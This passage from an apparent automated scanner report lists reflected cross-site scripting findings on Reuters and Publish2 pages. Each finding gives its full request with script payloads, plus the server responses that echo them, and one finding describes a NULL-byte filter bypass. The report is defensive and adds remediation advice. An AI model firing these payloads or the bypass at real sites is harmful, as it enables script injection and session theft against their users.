Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-LI-IDC=C1; bcookie="v=1&e6907e29-3b50-4659-95ed-c5124b8e731f"; visit=G; NSC_MC_WT_FU_IUUQ=ffffffffaf1994c945525d5f4f58455e445a4a42198d

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:58:54 GMT
Content-Length: 182

IN.Tags.Share.handleCount({"count":0,"url":"http:\/\/www.reuters.com\/article\/2011\/09\/04\/us-weather-football-idUSTRE78222D20110904c23af<img src=a onerror=alert(1)>8205f4fbbb7"});

5.73. http://www.publish2.com/newsgroups/state-worker.js [_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.publish2.com
Path:   /newsgroups/state-worker.js

Issue detail

The value of the _ request parameter is copied into the HTML document as plain text between tags. The payload aede9<a>fb44affacea was submitted in the _ parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /newsgroups/state-worker.js?jsonp_callback=jQuery15205311797398608178_1315097321812&_=1315097336789aede9<a>fb44affacea HTTP/1.1
Host: www.publish2.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:03:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession=tjqibcmmv4ife4uj4v539uolt4; path=/
P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: kohanasession_data=6pJEXIffSQeOxbFJRglsy1N3NgAhoMtdMg0KP5%2FMCS1HfmmNr3Jc4UrzwEAcqYQmxttgfAUC5fWHasy3%2BuUKcK8VH6PA6LJDnKm7GUG5M2J4HcEhb1cmLD%2BcGlocHzy%2BCA9ycFwrZSyf0cgynGrESRtIEbKRNRQaYkO4C%2Fv5KAGduUZjFPmMge%2FgVEePPdgA4mh8yj%2BAIeKVACzUCrRiBNj9hNLQSZ0ghY8I6b4OznDrCm5FrRwQnZJhEFCHdBWAq%2Fx86YMPs5UBVGGQxwwWchEqVUJ%2FGREixrecBVlbcJeKUI4C9af0OM1EbMfYd7amL26MSFTPGwXfLudqJ79Rg%2FfJOPurn0yLy8smVyr16RKXJ9PPEWZT; path=/
Content-Type: application/json; charset=utf-8
Content-Length: 12581

jQuery15205311797398608178_1315097321812({"title":"State Worker","feedlink":"http:\/\/www.publish2.com\/newsgroups\/state-worker.js?jsonp_callback=jQuery15205311797398608178_1315097321812&_=1315097336789aede9<a>fb44affacea","sitelink":"http:\/\/www.publish2.com\/","description":"Links of interest to California state workers and those who follow the bureaucracy.","last_build_date":"Sun, 04 Sep 2011 01:03:22 +0000","total
...[SNIP]...

5.74. http://www.publish2.com/newsgroups/state-worker.js [jsonp_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publish2.com
Path:   /newsgroups/state-worker.js

Issue detail

The value of the jsonp_callback request parameter is copied into the HTML document as plain text between tags. The payload 442ea<script>alert(1)</script>060310a8b2e was submitted in the jsonp_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsgroups/state-worker.js?jsonp_callback=jQuery15205311797398608178_1315097321812442ea<script>alert(1)</script>060310a8b2e&_=1315097336789 HTTP/1.1
Host: www.publish2.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:03:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession=f54702b4i9nutq0ri22oj2ip01; path=/
P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: kohanasession_data=UjRvqJa9Eqx5QsHwXvtTAMlRPn1qqiKkaBofe%2BXITQxJQ4qocxvavqYqKhREHwrdbOrJ%2Fu8dghXYIhnb1PK%2FGa1yI4z2ClG0Tr36e08qdUGK5giXu45KviCKOjymZvAh4QGtRmz2puRlWEtbuX1soBcVfTsIym4QT2GSrDqo%2BPeyfoSk2SBwg%2FPiQFu5IjmNBMie2n0Yt5zUdDiHp2S17Kji7v%2FOnij3QnRVk%2FbdtToibIVs9BxzVpMsNVOzvOwfJ4HCZUN7pPZ1fQ9PLRxdUjlkK24nF2Aw61jWyLwlzyPsKyWYqdwwSg6YRn1nT9xutqwdXuK7syz026lFuBxN0fqCRL05hslZvNWzYkYAJe6Bf%2BEfmGgg; path=/
Content-Type: application/json; charset=utf-8
Content-Length: 12645

jQuery15205311797398608178_1315097321812442ea<script>alert(1)</script>060310a8b2e({"title":"State Worker","feedlink":"http:\/\/www.publish2.com\/newsgroups\/state-worker.js?jsonp_callback=jQuery15205311797398608178_1315097321812442ea<script>
...[SNIP]...

5.75. http://www.publish2.com/newsgroups/state-worker.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.publish2.com
Path:   /newsgroups/state-worker.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00d2877<a>a00f557732f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d2877<a>a00f557732f in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /newsgroups/state-worker.js?jsonp_callback=jQuery15205311797398608178_1315097321812&_=1315097336789&%00d2877<a>a00f557732f=1 HTTP/1.1
Host: www.publish2.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:03:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession_data=deleted; expires=Sat, 04-Sep-2010 01:03:40 GMT; path=/
Set-Cookie: kohanasession=lbcsf8itchvlv8shikh8vhsdd6; path=/
P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: kohanasession_data=byTxifj9sEuzmxkMB8HE9YLK6MkctiF77DZp6uQNjjPv8OHj9z3%2BTnkuRPNaIkM1Y9s1dqvSPGjs%2Bl90USsr7gr2FyFio9LpVYl5Y8nEt6peSvTt0E3QrkSbCp2vOGTii43s1DJ8pYmHK0KAyzjjo8VYWSqpNRlRCPmC7U8XtLZxuyGorYN34pUhKXPsOsNPZeszXIuXuTEpTAANTbLF8jSJ381L%2Bm818ESSYQp7PoBNsFAzcfs5c2%2Bv%2Bcv289Y0SbCOt8RtoliIrBcO4k4K6Gpekg0mtI9J5xTagcGLjR4SVdCtabQkmnKxH4mRUA%2FLSSFn5%2BXFADxk6pFLiNQHeuHamh7A28%2Bups3KhR9eXN0UJv1LnAAc; path=/
Content-Type: application/json; charset=utf-8
Content-Length: 12587

jQuery15205311797398608178_1315097321812({"title":"State Worker","feedlink":"http:\/\/www.publish2.com\/newsgroups\/state-worker.js?jsonp_callback=jQuery15205311797398608178_1315097321812&_=1315097336789&%00d2877<a>a00f557732f=1","sitelink":"http:\/\/www.publish2.com\/","description":"Links of interest to California state workers and those who follow the bureaucracy.","last_build_date":"Sun, 04 Sep 2011 01:03:42 +0000","tot
...[SNIP]...

5.76. http://www.reuters.com/assets/commentsChild [articleId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /assets/commentsChild

Issue detail

The value of the articleId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42c07"><script>alert(1)</script>e18cfb78b21 was submitted in the articleId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /assets/commentsChild?canonical_article_id=/article/2011/09/04/us-weather-football-idUSTRE78222D20110904&articleId=USTRE78222D2011090442c07"><script>alert(1)</script>e18cfb78b21&headline=Notre+Dame%2C+Michigan+stadiums+cleared+due+to+storms&channel=domesticNews&edition=BETAUS&view=base HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; _tr_ref.6e08dd17=1315097066.http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX; _tr_id.6e08dd17=88dc7998fd25ddac.1315097066.1.1315097066.1315097066; _tr_ses.6e08dd17=1315097065832; _tr_cv.6e08dd17=false; adops_master_kvs=xa%3Dn%3B; xa=xa%3Dn%3B; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315115075506:ss=1315115075506; rsi_segs=I07714_10272|I07714_10273|I07714_10456; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.1.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football; tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:51:41 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 4900

<!--[if !IE]> This has NOT been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: S264630NJ2XSF26 <![endif]-->
<!--[if !IE]> token: 892733d4-f219-4aaf-a26f-4ff2daae13fd <
...[SNIP]...
<input type="hidden" name="article_id" value="USTRE78222D2011090442c07"><script>alert(1)</script>e18cfb78b21" />
...[SNIP]...

5.77. http://www.reuters.com/assets/commentsChild [channel parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /assets/commentsChild

Issue detail

The value of the channel request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de11a"><script>alert(1)</script>663f7664906 was submitted in the channel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /assets/commentsChild?canonical_article_id=/article/2011/09/04/us-weather-football-idUSTRE78222D20110904&articleId=USTRE78222D20110904&headline=Notre+Dame%2C+Michigan+stadiums+cleared+due+to+storms&channel=domesticNewsde11a"><script>alert(1)</script>663f7664906&edition=BETAUS&view=base HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; _tr_ref.6e08dd17=1315097066.http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX; _tr_id.6e08dd17=88dc7998fd25ddac.1315097066.1.1315097066.1315097066; _tr_ses.6e08dd17=1315097065832; _tr_cv.6e08dd17=false; adops_master_kvs=xa%3Dn%3B; xa=xa%3Dn%3B; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315115075506:ss=1315115075506; rsi_segs=I07714_10272|I07714_10273|I07714_10456; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.1.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football; tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:52:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 5213

<!--[if !IE]> This has NOT been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: S264630NJ2XSF13 <![endif]-->
<!--[if !IE]> token: 07237ae1-8f58-470a-bbcb-d116e1992d4f <
...[SNIP]...
<input type="hidden" name="channel" value="domesticNewsde11a"><script>alert(1)</script>663f7664906" />
...[SNIP]...

5.78. http://www.reuters.com/assets/newsFlash [&flashPath parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /assets/newsFlash

Issue detail

The value of the &flashPath request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e58d'%3balert(1)//87be1ff7cb was submitted in the &flashPath parameter. This input was echoed as 6e58d';alert(1)//87be1ff7cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /assets/newsFlash?&flashPath=http://sales.reuters.com/pitches/roughcuts/rc728x90.swf%3FclickTag%3Dhttp%253A//www.reuters.com/%26channelName%3D16e58d'%3balert(1)//87be1ff7cb&vcount=1&videoChannel=1&w=728&h=90&akamaize=n&gifPath=http%3A//sales.reuters.com/pitches/roughcuts/rc728x90.gif&clickTag=http%3A//www.reuters.com/ HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; _tr_ref.6e08dd17=1315097066.http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX; _tr_id.6e08dd17=88dc7998fd25ddac.1315097066.1.1315097066.1315097066; _tr_ses.6e08dd17=1315097065832; _tr_cv.6e08dd17=false; adops_master_kvs=xa%3Dn%3B; xa=xa%3Dn%3B; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315115075506:ss=1315115075506; rsi_segs=I07714_10272|I07714_10273|I07714_10456; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.1.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football; tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:50:24 GMT
Server: Apache-Coyote/1.1
Last-UpdatedL: Sun, 04 Sep 2011 00:41:38 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 10745

<!--[if !IE]> This has NOT been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: S264630NJ2XSF31 <![endif]-->
<!--[if !IE]> token: 75d68b0e-7e26-420d-a60c-5ba564f496b3 <
...[SNIP]...
ockwave/cabs/flash/swflash.cab#version=7,0,0,0',
           'width', '728',
           'height', '90',
           'src', 'http://sales.reuters.com/pitches/roughcuts/rc728x90?clickTag=http%3A//www.reuters.com/&channelName=16e58d';alert(1)//87be1ff7cb',
           'quality', 'high',
           'pluginspage', 'http://www.macromedia.com/go/getflashplayer',
           'align', 'middle',
           'wmode', 'transparent',
           'id', 'flash',
           'bgcolor', '#ffffff',
           'name', '
...[SNIP]...

5.79. http://www.reuters.com/assets/newsFlash [&flashPath parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /assets/newsFlash

Issue detail

The value of the &flashPath request parameter is copied into an HTML comment. The payload a467f--><script>alert(1)</script>ce7cfc0e2c5 was submitted in the &flashPath parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /assets/newsFlash?&flashPath=http://sales.reuters.com/pitches/roughcuts/rc728x90.swf%3FclickTag%3Dhttp%253A//www.reuters.com/%26channelName%3D1a467f--><script>alert(1)</script>ce7cfc0e2c5&vcount=1&videoChannel=1&w=728&h=90&akamaize=n&gifPath=http%3A//sales.reuters.com/pitches/roughcuts/rc728x90.gif&clickTag=http%3A//www.reuters.com/ HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; _tr_ref.6e08dd17=1315097066.http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX; _tr_id.6e08dd17=88dc7998fd25ddac.1315097066.1.1315097066.1315097066; _tr_ses.6e08dd17=1315097065832; _tr_cv.6e08dd17=false; adops_master_kvs=xa%3Dn%3B; xa=xa%3Dn%3B; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315115075506:ss=1315115075506; rsi_segs=I07714_10272|I07714_10273|I07714_10456; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.1.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football; tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:50:28 GMT
Server: Apache-Coyote/1.1
Last-UpdatedL: Sun, 04 Sep 2011 00:41:38 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 10796

<!--[if !IE]> This has NOT been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: S264630NJ2XSF14 <![endif]-->
<!--[if !IE]> token: 8b34b729-2f70-45ff-ba51-15184d439003 <
...[SNIP]...
<!-- http://sales.reuters.com/pitches/roughcuts/rc728x90?clickTag=http%3A//www.reuters.com/&channelName=1a467f--><script>alert(1)</script>ce7cfc0e2c5 -->
...[SNIP]...

5.80. http://www.reuters.com/assets/newsFlash [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /assets/newsFlash

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 669f1'%3balert(1)//52a8ec3cf2b was submitted in the h parameter. This input was echoed as 669f1';alert(1)//52a8ec3cf2b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /assets/newsFlash?&flashPath=http://sales.reuters.com/pitches/roughcuts/rc728x90.swf%3FclickTag%3Dhttp%253A//www.reuters.com/%26channelName%3D1&vcount=1&videoChannel=1&w=728&h=90669f1'%3balert(1)//52a8ec3cf2b&akamaize=n&gifPath=http%3A//sales.reuters.com/pitches/roughcuts/rc728x90.gif&clickTag=http%3A//www.reuters.com/ HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; _tr_ref.6e08dd17=1315097066.http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX; _tr_id.6e08dd17=88dc7998fd25ddac.1315097066.1.1315097066.1315097066; _tr_ses.6e08dd17=1315097065832; _tr_cv.6e08dd17=false; adops_master_kvs=xa%3Dn%3B; xa=xa%3Dn%3B; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315115075506:ss=1315115075506; rsi_segs=I07714_10272|I07714_10273|I07714_10456; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.1.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football; tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:50:52 GMT
Server: Apache-Coyote/1.1
Last-UpdatedL: Sun, 04 Sep 2011 00:41:38 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 10692

<!--[if !IE]> This has NOT been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: S264630NJ2XSF02 <![endif]-->
<!--[if !IE]> token: e8324ba3-74c3-4fec-b687-322963413326 <
...[SNIP]...

   } else {
       // embed the flash movie
       AC_FL_RunContent(
           'codebase', 'http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,0,0',
           'width', '728',
           'height', '90669f1';alert(1)//52a8ec3cf2b',
           'src', 'http://sales.reuters.com/pitches/roughcuts/rc728x90?clickTag=http%3A//www.reuters.com/&channelName=1',
           'quality', 'high',
           'pluginspage', 'http://www.macromedia.com/go/getflashpla
...[SNIP]...

5.81. http://www.reuters.com/assets/newsFlash [w parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /assets/newsFlash

Issue detail

The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 783fd'%3balert(1)//f2696c00016 was submitted in the w parameter. This input was echoed as 783fd';alert(1)//f2696c00016 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /assets/newsFlash?&flashPath=http://sales.reuters.com/pitches/roughcuts/rc728x90.swf%3FclickTag%3Dhttp%253A//www.reuters.com/%26channelName%3D1&vcount=1&videoChannel=1&w=728783fd'%3balert(1)//f2696c00016&h=90&akamaize=n&gifPath=http%3A//sales.reuters.com/pitches/roughcuts/rc728x90.gif&clickTag=http%3A//www.reuters.com/ HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; _tr_ref.6e08dd17=1315097066.http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX; _tr_id.6e08dd17=88dc7998fd25ddac.1315097066.1.1315097066.1315097066; _tr_ses.6e08dd17=1315097065832; _tr_cv.6e08dd17=false; adops_master_kvs=xa%3Dn%3B; xa=xa%3Dn%3B; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315115075506:ss=1315115075506; rsi_segs=I07714_10272|I07714_10273|I07714_10456; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.1.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football; tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:50:45 GMT
Server: Apache-Coyote/1.1
Last-UpdatedL: Sun, 04 Sep 2011 00:41:38 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 10692

<!--[if !IE]> This has NOT been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: S264630NJ2XSF25 <![endif]-->
<!--[if !IE]> token: b80bcee9-8c35-4d7a-945c-b4822a95f4d5 <
...[SNIP]...
ML output folder.");
   } else {
       // embed the flash movie
       AC_FL_RunContent(
           'codebase', 'http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,0,0',
           'width', '728783fd';alert(1)//f2696c00016',
           'height', '90',
           'src', 'http://sales.reuters.com/pitches/roughcuts/rc728x90?clickTag=http%3A//www.reuters.com/&channelName=1',
           'quality', 'high',
           'pluginspage', 'http://www.macromedi
...[SNIP]...

5.82. http://www.reuters.com/assets/searchIntercept [blob parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /assets/searchIntercept

Issue detail

The value of the blob request parameter is copied into the HTML document as plain text between tags. The payload ae54f<script>alert(1)</script>793ad682c63 was submitted in the blob parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /assets/searchIntercept?blob=ae54f<script>alert(1)</script>793ad682c63 HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
